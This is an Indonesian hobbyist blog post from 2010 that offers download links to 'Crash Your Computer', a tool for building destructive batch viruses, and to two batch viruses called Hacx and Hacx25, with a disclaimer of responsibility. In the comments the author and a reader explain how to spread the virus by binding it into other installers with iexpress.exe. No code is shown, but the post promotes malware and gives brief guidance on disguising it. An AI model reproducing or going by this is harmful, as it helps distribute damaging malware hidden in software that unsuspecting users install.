Senin, 20 Desember 2010

Program Batch Berbahaya !!!

Wah akhirnya setelah selesai ujian bisa main internet lagi dengan tenang di rumah .
Sebenarnya sih sudah 2 hari ini selesai ujian, tapi karena ada gangguan jaringan jadi koneksi internetnya putus.
Langsung aja ya . :)

Crash Your Computer

Dengan bangga saya persembahkan kepada anda Crash Your Computer, wah lebay banget kata2 nya .
Program berbasis konsol (CMD) sebenarnya sudah lama saya buat, tapi baru sekarang bisa nguploadnya .
Program ini patut anda coba, sekaligus agar saya bisa mengetahui bug2 yang terdapat pada program ini, sehingga saya bisa memperbaikinya.
Perhatian ... Saya tidak bertanggung jawab atas segala kerusakan yang ditimbulkan oleh program ini . :)
Anda disarankan untuk meng-export registry anda terlebih dahulu sebelum mencoba program ini .

Definisi Program :
Dengan program ini anda bisa membuat beberapa virus yang sifatnya lumayan merusak . Juga beberapa tips-tips keren tentang dunia hacking dan virus, walaupun ga seberapa sih . :)
berikut link nya  : http://www.4shared.com/file/zPF6SmAe/Crash_Your_Computer__Installer.html

Hacx dan Hacx25

Ini adalah virus batch yang lumayan merusak. Sayangnya saya belum mencoba nya. Disitulah serunya membuat virus, yaitu kita harus bisa memperkirakan bagaimana kerja virus tersebut tanpa mencobanya. Walaupun kesalahan dalam kode program sudah saya usahakan seminimal mungkin, tidak tertutup kemungkinan bahwa virus ini ternyata tidak bekerja .
Link download :
1. Hacx
2. Hacx25

3 komentar:

  1. trus cara nyebarin virus nya gmn mas??apa kaya klo kita install program??

    BalasHapus
  2. cara penyebarannya kayanya harus di bind ama program lain. Bind = digabungkan, dalam arti jika kita menginstall software yang telah di bind dengan program lain, maka software yang di bind itu juga akan ikut terinstall . Kira-kira begitulah ... saya cuma tau teorinya , belum ada nyali nyebarin virus .. :D hehe ..

    BalasHapus
  3. mau coba ngebind sebuah file dengan file lain ...
    buka run >> iexpress.exe >> enter ...
    ikuti instruksinya .. :D

    BalasHapus